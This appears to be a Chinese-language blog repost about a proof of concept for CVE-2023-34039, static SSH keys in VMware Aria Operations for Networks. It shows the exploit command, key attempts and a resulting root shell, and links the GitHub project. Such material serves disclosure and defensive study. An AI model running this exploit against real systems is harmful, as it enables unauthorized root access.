POC来源于Github请在虚拟环境中,进行使用。
CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) 的 POC 静态 SSH 密钥 RCE
该漏洞的根本原因分析可以在我的博客上找到:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/
VMWare Aria Operations for Networks (vRealize Network Insight) 从版本 6.0 到 6.10 不会为 和support用户重新生成 ssh 密钥ubuntu,从而允许具有 SSH 访问权限的攻击者获得root对此产品的 shell 访问权限。
ProjectDiscovery Research的Harsh Jaiswal (@rootxharsh) 和Rahul Maini (@iamnoooob)向 VMWare 报告了此问题
我刚刚编写了这个漏洞利用程序(如果你可以这样称呼它的话),因为它基本上是一个 ssh 命令包装器。
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform
********************************** ATTENTION **********************************
NTP Service is not healthy.
IMPACT: It may affect the proper working of other services.
ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
[email protected]:~$ sudo -i
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# hostname
vrni-platform-release
[email protected]:~#
项目地址:
https://github.com/sinsinology/CVE-2023-34039
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里